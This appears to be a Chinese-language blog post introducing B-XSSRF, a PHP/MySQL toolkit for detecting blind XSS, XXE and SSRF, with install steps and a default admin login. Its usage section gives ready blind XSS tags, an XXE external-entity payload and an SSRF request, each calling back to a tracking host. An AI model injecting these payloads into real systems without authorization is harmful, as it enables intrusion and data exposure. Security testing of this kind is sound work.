B-XSSRF:用于检测和跟踪Blind XSS,XXE和SSRF的工具包
- 发表于
- 安全工具
B-XSSRF介绍
XSSRF是一个用于检测和跟踪Blind XSS,XXE和SSRF的工具包,基于php+mysql的WEB端程序,它拥有简洁漂亮的界面。
XSSRF安装
下载源码
git clone https://github.com/SpiderMate/B-XSSRF.git
- 将文件上传到您的服务器。
- 创建一个数据库并将database.sql导入。
- 更改db.php文件中的DB信息。
- 准备好了。
XSSRF使用
BLIND XSS
<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php">
BLIND XXE
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>
SSRF
GET /testssrf.php=http://mysite.com/bxssrf/request.php
默认帐户
USER : admin@test.com
PASS : 123456
原文连接:B-XSSRF:用于检测和跟踪Blind XSS,XXE和SSRF的工具包
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。